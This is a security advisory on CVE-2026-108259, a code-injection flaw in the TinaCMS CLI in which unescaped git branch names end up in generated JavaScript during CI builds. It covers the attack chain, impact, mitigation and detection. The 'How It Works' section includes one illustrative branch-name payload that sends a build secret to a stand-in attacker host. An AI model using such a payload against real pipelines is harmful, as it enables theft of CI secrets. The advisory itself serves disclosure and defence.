SECURITYHIGHCVE-2026-108259

CVE-2026-108259: TinaCMS CLI Code Injection via Unescaped Git Branch Name

TinaCMS CLI interpolates raw git branch names into generated JS, letting a crafted branch inject code during CI/CD builds.

Dylan H.

Security Team

October 10, 2026
5 min read
CVE-2026-108259: TinaCMS CLI Code Injection via Unescaped Git Branch Name

Affected Products

  • tinacms/tinacms — @tinacms/cli versions prior to 3.0.0

Overview

TinaCMS's @tinacms/cli package generates Next.js codegen client code during the build process, and as part of that it determines the current git branch (from VERCEL_GIT_COMMIT_REF, GITHUB_BRANCH, or a HEAD fallback) to build an API URL for the generated client. CVE-2026-108259 (CVSS 8.2, High) is a code-injection flaw where that raw branch-name string is spliced into generated JavaScript string literals without escaping, letting a maliciously named git branch break out of the literal and inject arbitrary code that runs during a build. It was published October 9, 2026, and affects all @tinacms/cli versions prior to 3.0.0. This is a distinct bug from CVE-2026-108261, a separate TinaCMS admin-preview-iframe issue disclosed the same day — do not conflate the two.


Technical Details

FieldValue
CVE IDCVE-2026-108259
CVSS Score8.2 (High)
CWECWE-94 (Improper Control of Generation of Code — Code Injection)
Attack VectorNetwork/Local (requires control of a git branch name that gets built, e.g. via a CI pipeline or Vercel preview build)
Affected Component@tinacms/cli, packages/@tinacms/cli/src/next/codegen/index.ts and packages/@tinacms/cli/src/next/codegen/codegen/plugin.ts
Root CauseGit branch name (VERCEL_GIT_COMMIT_REF / GITHUB_BRANCH / HEAD) interpolated unescaped into generated JS string literals
Fixed In@tinacms/cli 3.0.0

How It Works

During a build, @tinacms/cli needs to point the generated Next.js client at the right TinaCMS API endpoint, so it reads the active branch name from CI-provided environment variables (falling back to the local git HEAD if those aren't set) and concatenates that value into an API URL. That URL is then written directly into generated JavaScript source as a string literal — with no JSON.stringify, encodeURIComponent, or other escaping applied anywhere in the pipeline.

Because git branch names can legally contain characters like quotes, a branch named something equivalent to main'; fetch('https://attacker.example/exfil?d='+process.env.SECRET); // (illustrative only — any single quote in a branch name is enough to close the literal early) would terminate the string literal early and splice the remainder in as executable JavaScript. When the generated client module is later imported — during the build itself, or when the generated code runs — that injected expression executes with the privileges of the build process.


Impact Assessment

Impact AreaDescription
ConfidentialityHigh — injected JS can exfiltrate build secrets/env vars available during CI/build
IntegrityHigh — generated application code is tampered with
AvailabilityMedium — could break builds or inject persistent malicious code into the shipped app

Who Is At Risk

  • Projects using @tinacms/cli codegen in CI/CD pipelines — especially Vercel preview deployments or GitHub Actions — that build branches pushed by external or untrusted contributors
  • Public repositories that accept pull requests from forks and run automated preview builds against them
  • Any pipeline where build-time environment variables (deploy tokens, API keys, secrets) are exposed to builds triggered by branch names an attacker can choose

Attack Chain

  1. Attacker forks a public repository that runs @tinacms/cli codegen in CI and opens a pull request from a branch with a maliciously crafted name (containing a quote character that breaks out of a JS string literal)
  2. CI or a Vercel preview build checks out the branch and runs TinaCMS codegen, which reads the branch name from VERCEL_GIT_COMMIT_REF / GITHUB_BRANCH / HEAD
  3. The raw branch name is interpolated unescaped into the generated client's JS source as part of an API URL string literal
  4. The injected expression executes when the generated module is imported — during the build step or at runtime of the generated code
  5. Attacker achieves code execution in the build environment, potentially exposing CI secrets, environment variables, or deploy tokens, and can tamper with the generated application code

Mitigation

Immediate Actions

  • Upgrade to @tinacms/cli 3.0.0 or later
  • Review CI/CD pipeline configuration for whether pull requests from forks can trigger TinaCMS codegen builds with access to sensitive environment variables or secrets
  • Rotate any CI/deploy secrets that may have been exposed to preview builds of untrusted branches prior to patching

Detection Opportunities

  • Review recent build logs for anomalous branch names containing quote characters or JS syntax
  • Audit generated codegen output (the client file under .tina/codegen output directories) for unexpected content beyond the expected API URL
  • Check CI history for builds triggered by fork PRs with unusual or suspicious branch names

Defence-in-Depth

  • Don't expose build secrets to preview builds triggered by external/fork pull requests
  • Pin @tinacms/cli to a patched version (≥3.0.0) via the lockfile and keep it current via dependency update tooling
  • Run codegen in an isolated or sandboxed CI step with minimal credential exposure

Background

TinaCMS is a popular open-source headless CMS designed for git-backed, visually editable content in Next.js and other frameworks. This vulnerability is a textbook example of a recurring supply-chain weakness class: CI/CD tooling that trusts developer-controlled environment values — like git branch names, commit messages, or PR titles — without sanitizing them before using that value in a sensitive context such as generated code, shell commands, or URLs. Because branch names are attacker-controlled in any workflow that builds pull requests from forks, any tool that interpolates them unescaped into executable contexts is exposed to the same class of injection risk.


References